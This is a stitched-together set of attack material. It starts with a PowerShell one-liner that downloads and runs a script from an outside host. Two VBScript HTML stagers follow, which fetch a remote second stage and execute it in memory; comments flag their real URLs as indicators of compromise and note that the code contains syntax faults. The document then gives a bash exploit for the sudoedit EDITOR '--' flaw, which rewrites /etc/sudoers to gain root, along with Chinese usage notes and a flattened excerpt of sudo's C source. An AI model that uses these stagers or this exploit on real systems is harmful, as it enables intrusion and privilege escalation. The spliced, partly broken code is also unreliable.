IEX (New-Object Net.Webclient).downloadstring("http://educatiolink.com/index.php")
<html>
<!-- Sample 1: VBScript download-and-execute stager (reformatted from a single extracted line;
     the "<scriptlanguage" tag is reproduced as extracted - presumably "<script language"
     in the original). -->
<scriptlanguage="vbscript">
' Swallow every runtime error so a failed fetch never surfaces to the victim.
On Error Resume Next
' Server-side XMLHTTP object used to fetch the second stage.
Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0")
' The literal request target is "baidu.com" (third argument False = synchronous request).
' The trailing VBScript comment carries the URL presumably used by the original sample -
' treat it as an IOC for blocking/hunting only; do not visit it.
Posto.open "GET", "baidu.com", False ' http://hpurusymireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1
Posto.send
' NOTE(review): "to" is a VBScript reserved word (For ... To), so this line should not parse
' as written; the published sample may have been altered.
to = Posto.responseText
' The response body is run straight from memory as VBScript - nothing here writes to disk.
Execute(to)
</script>
</html>
<html>
<!-- Sample 2: same fetch-and-Execute stager as sample 1, but the payload comes back
     transposed and is reordered by cooo() before it is executed. -->
<!-- A simple subsequence-splicing (de-transposition) function -->
<!-- Input:  '123456789abcdefghiklm' -->
<!-- Output: '1a2b3c4d5e6f7g8h9iklm' -->
<scriptlanguage="vbscript">
' Swallow every runtime error.
On Error Resume Next
' Undo the server-side transposition of the fetched payload.
' The input is treated as rows of 9 characters; the output is built column by column
' (first character of every complete row, then the second character of every row, ...)
' and the incomplete trailing row (Len mod 9 characters) is appended untouched.
' Example: "123456789abcdefghiklm" -> "1a2b3c4d5e6f7g8h9iklm".
' c: transposed text. Returns the reordered text; an empty string yields "".
Function cooo(c)
    Dim total, rows, col, row, plain
    total = Len(c)
    rows = Int(total / 9)          ' number of complete 9-character rows
    plain = ""
    For col = 1 To 9
        For row = 0 To rows - 1
            plain = plain & Mid(c, row * 9 + col, 1)
        Next
    Next
    ' Leftover characters were never transposed; copy them verbatim.
    cooo = plain & Right(c, total - rows * 9)
End Function
' Server-side XMLHTTP object used to fetch the second stage.
Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0")
' The literal request target is "baidu.com" (third argument False = synchronous request).
' The trailing VBScript comment carries the URL presumably used by the original sample -
' treat it as an IOC for blocking/hunting only; do not visit it.
Posto.open "GET", "baidu.com", False ' https://christinadudley.com/public_html/edudley/sites/default/files/1203427/expres.php?op=1
Posto.send
' NOTE(review): "to" is a VBScript reserved word (For ... To), so this line should not parse
' as written; the published sample may have been altered.
to = Posto.responseText
' Reverse the transposition, then run the result straight from memory as VBScript.
to = cooo(to)
Execute(to)
</script>
</html>
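# Local privilege escalation through sudoedit's "--" handling.
# A crafted EDITOR value ("vim -- /etc/sudoers") makes sudoedit treat /etc/sudoers as an
# additional file to edit, because sudo_edit() in src/sudo_edit.c splits argv on the first
# "--" it finds (see the C excerpt below). It only works when sudoers already allows this
# user to run sudoedit on *some* file as root. The version gate below treats 1.9.12p1 as the
# last affected release. Requires bash (read -p, [[ ]]); sudo may prompt for a password.

# Version gate. The original pattern '1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1' skipped
# 1.9.10(pN) and plain 1.9.12, both inside the range it otherwise treats as affected
# (1.8.x .. 1.9.12p1); the pattern below covers the whole range and any patch level.
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.([0-9]|1[01])(p[0-9]+)?|1\.9\.12(p1)?)$'
then
    echo "> Currently installed sudo version is not vulnerable"
    exit 1
fi

# Look for a sudoers rule such as "test ALL=(ALL:ALL) sudoedit /some/file": keep only the
# lines of "sudo -l" that mention sudoedit / "sudo -e" and run as root, and strip everything
# up to and including the "(user : group)" spec so that the command and its file(s) remain.
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then
    echo "> It doesn't seem that this user can run sudoedit as root"
    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
    echo "> BINGO! User exploitable"
fi

echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
echo "$EXPLOITABLE"

# Expands to e.g.:  EDITOR="vim -- /etc/sudoers" sudoedit /etc/custom_test.txt
# $EXPLOITABLE is deliberately unquoted so the command and its argument(s) word-split.
# If several rules matched, their lines are concatenated into one command line (check the
# echo above); if it is empty (user chose to proceed anyway) this line is only a variable
# assignment and nothing is opened.
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
# Only succeeds if the user actually added the "$USER ALL=(ALL:ALL) ALL" line and saved.
sudo su root
exit 0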
2.在上面的exp运行时,按两下回车,会自动打开sudoers的编辑界面。
将之前的 `test ALL=(ALL:ALL) sudoedit` 改为 `test ALL=(ALL:ALL) ALL`，保存并退出。
// src/sudo_edit.c@sudo_edit() int sudo_edit(struct command_details *command_details) { // [...] /* * Set real, effective and saved uids to root. * We will change the euid as needed below. */ //设置了ROOT权限和临时可写目录 setuid(ROOT_UID); // [...] /* Find a temporary directory writable by the user. */ set_tmpdir(&user_details.cred); // [...] /* * The user's editor must be separated from the files to be * edited by a "--" option. */ //argv[]={'vim','--','/etc/sudoers','--','/etc/custom_test.txt'} for (ap = command_details->argv; *ap != NULL; ap++) { if (files) nfiles++; //命令行参数与--比较,如果相同则将下一个内容视为要编辑的文件名 elseif (strcmp(*ap, "--") == 0) files = ap + 1; else editor_argc++; }
/* * We use "--" to separate the editor and arguments from the files * to edit. The editor arguments themselves may not contain "--". */ if (strcmp(nargv[nargc], "--") == 0) { sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);